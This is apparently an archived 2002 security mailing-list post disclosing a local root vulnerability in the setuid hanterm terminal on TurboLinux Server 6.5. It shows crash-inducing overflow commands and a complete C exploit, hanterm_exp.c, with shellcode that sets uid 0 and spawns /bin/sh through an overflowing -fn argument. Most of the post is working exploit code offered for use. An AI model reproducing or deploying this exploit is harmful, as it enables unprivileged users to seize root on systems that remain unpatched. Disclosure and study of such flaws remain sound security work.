('binary' encoding is not supported, stored as-is) Hi,I'm xperc. hanterm is Hangul terminal for X. it is based on the xterm in XFree86. The hanterm binary is default installed with setuid root permissions for TurboLinux Server 6.5. but contains insecure code with allows unprivileged local users to obtain root access on the local system. $which hanterm /usr/bin/X11/hanterm $ls -l /usr/bin/X11/hanterm -rws--x--x 1 root root 166100 03 13 2001 /usr/bin/X11/hanterm* $rpm -qf /usr/bin/X11/hanterm hanterm-xf-p18-3.3-6 $hanterm -fn `perl -e 'print "a"x100'` Segmentation fault $hanterm -hfb `perl -e 'print "a"x8000'` Segmentation fault $hanterm -hfn `perl -e 'print "a"x8000'` Segmentation fault ...etc /* hanterm_exp.c * * local exploit for hanterm * .. tested in TurboLinux Server 6.5 (Japan) * * thanks my Japanese friend kaju(kaijyu) * and Japanese hacker UNYUN. * * by xpercat_private * 2002/02/07 */ #include <stdio.h> #define NOP 0x90 #define MAXBUF 88 #define RETOFS 84 #define SHELL_OFS 22 #define ESP_OFS -0xe38 unsigned int get_esp() { __asm__("mov %esp,%eax"); } int main() { static char shellcode[]={ 0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80, 0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80, 0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0, 0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b, 0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c, 0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f, 0x62,0x69,0x6e,0x2f,0x73,0x68,0x00 }; unsigned int retadr; char buf[MAXBUF]; int i; memset(buf,NOP,MAXBUF); retadr=get_esp()+ESP_OFS; printf("Jumping address = %p\n",retadr); for(i=RETOFS-32;i<RETOFS+32;i+=4){ buf[i] =retadr&0xff; buf[i+1]=(retadr>>8)&0xff; buf[i+2]=(retadr>>16)&0xff; buf[i+3]=(retadr>>24)&0xff; } strncpy(buf+SHELL_OFS,shellcode,strlen (shellcode)); //buf[MAXBUF-1]='\0'; faint!:-( execl("/usr/bin/X11/hanterm","hanterm","- fn",buf,(char *)0); }
This archive was generated by hypermail 2b30 : Thu Feb 07 2002 - 12:25:41 PST